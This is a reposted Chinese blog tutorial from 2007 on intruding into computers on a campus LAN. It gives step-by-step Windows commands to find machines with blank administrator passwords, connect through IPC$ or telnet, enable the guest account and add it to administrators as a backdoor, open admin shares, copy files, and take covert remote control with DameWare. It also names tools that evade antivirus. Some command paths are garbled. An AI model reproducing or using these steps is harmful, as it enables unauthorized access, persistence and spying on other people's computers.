来学校没事,看了些局域网电脑入侵的资料,加上自己实战经验(绝对没搞破坏,也没上传那些木马,这是一点的道德问题),总结出两种常用的入侵途径:
1.用139端口(IPC$)入侵 (我不常用,好像很难成功)
一.
先用"NTscan变态扫描器"扫描局域网某一网段(我这里只要是校园网内的就行)的IP,使用WMI扫描,端口139,得到一些弱口令(用户名为administrator,密码为空)的IP,使用cmd.exe,用net use IPIPC$ "" /user:administrator,但是绝大部分电脑都提示说:"发生系统错误 53。(wWW.niUbB.Net)找不到网络路径。"我想可能是被对方防火墙拦截了.只有极个别能连上.
net use 218.168.0.1IPC$ "" /user:administrator 提示“命令成功完成”,建立好了IPC$(远程管理连接) 二.
net time 192.168.0.1 显示远程主机的当前时间,显示时间为05:00
at 192.168.0.1 05:00 telnet 用at命令启动远程主机的telnet服务,但我用了可是没成功(也可用我得电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动,就OK了)
telnet 192.168.0.1 telnet上去
administrator 键入y后,输入的用户名,密码为空
三.
net user 查看用户,如:administrator,guest, HelpAssistant
net user guest /active:yes 激活guest用户
net user guest *** 更改guest的密码为***
net localgroup administrators guest /add 把guest的权限提升为管理员权限,为以后入侵留后门 四.
net share admin$ net share E$ 开共享,默认都是共享的
net share c$ /del 用来关闭共享的
net u** *192.168.0.1c$ "" /user:administrator 映射远程主机c$盘到本地x盘,这个我也没成功 五
使用"远程监控软件dameware"控制这台电脑.
六.
exit 断开远程主机的连接(没什么用,我都是直接关掉窗口的)
2.用23端口(telnet)入侵
一.(与上二大同)
先用"局域网查看工具V1.60"查看弱口令并开了23端口的,也可以只找到弱口令的主机,然后每个IP都按照电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动的方式开启telnet,再在cmd.exe中输入telnet IP,连不起的会出现"不能打开到主机的连接, 在端口 23: 连接失败",当然有些是开了23端口,但由于防火墙阻止了.
telnet 192.168.0.1 telent上去
administrator 输入y后,输入的用户名,密码为空
二.(同上三)
net user 查看用户 :administrator,guest, HelpAssistant
net user guest /active:yes 激活guest用户
net user guest **** 更改guest的密码为****
net localgroup administrators guest /add 把guest的权限提升为管理员权限
三.
局域网入侵教程 局域网电脑入侵
net share ipc$ net share admin$ net share E$ 开共享,默认都是共享的,ipc$一定要开,以便下一步net use 192.168.0.1IPC$ "" /user:administrator 建立IPC$(远程管理连接)
四.
使用"远程监控软件dameware"控制这台电脑.
附:
1.共享信息
net share e=e: 将远程主机的E盘共享, 访问时只需输入192.168.136.e
net share c=c:winntsystem 共享system文件夹
net share e /del 关闭E盘共享
2.telnet命令(DOS命令),在网上搜,太多了
dir d: 查看D盘 dir d:PROGRA~1 即program file文件夹,取前6个字母加上~符号,后面再加上数字1shutdown -s -t 60(60秒倒记时关机)opy复制文件 DEL删除 MKDIR创建目录 format格式化硬盘 IPCONFIG /ALL查看所有IP信息 NETSTAT -AN查看端口
3.ipc$常用命令,也在网上搜,也很多
copy c:x.exe 192.168.0.1c$ 即将c盘下的xinxin.exe复制到对方c盘内,这个我没弄成功
copy 192.168.0.1c$x.exe c: 将远程主机上的文件复制到自己的机器里
4.软件信息
一.远程开启telent服务的软件:"Recton--D贺免杀专用版",这个软件很好用,只需要远程主机IP和用户名密码,就可开telent,只可惜要被我金山毒霸杀掉,每次用它都要将实时防毒关掉.
二."远程监控软件dameware",这个软件很好,可以控制对方电脑就像在自己机子上操作一样,十分方便,具体教程网上去找,美中不足的是,每次连接上远程主机后,它都要在对方电脑上弹出连接提示窗口,还发出"当"的一声,除非对方又聋又瞎,不然都会被发现.(虽然我已把Additional Settings下的Enable SysTray Icon,和Notify Dialog下的Notify on Connection钩掉了都这样),所以着问题解决不了,这个软件就不要轻易使用.
三.端口扫描软件,这就太多了,网上一搜一大堆,也不晓得哪些好,我这里有"s扫描器","NTscan变态扫描器","流光5.0","hscan120扫描器"等
注:不要用来搞破坏哈.仅供娱乐!想上传木马的自己到网上找资料.
乱世狂人 2007.3.4
首发地址:http://user.qzone.***.com/164701150/blog/7
1.《局域网入侵 局域网入侵教程 局域网电脑入侵》援引自互联网,旨在传递更多网络信息知识,仅代表作者本人观点,与本网站无关,侵删请联系页脚下方联系方式。
2.《局域网入侵 局域网入侵教程 局域网电脑入侵》仅供读者参考,本网站未对该内容进行证实,对其原创性、真实性、完整性、及时性不作任何保证。
3.文章转载时请保留本站内容来源地址,https://www.lu-xu.com/jiaoyu/235655.html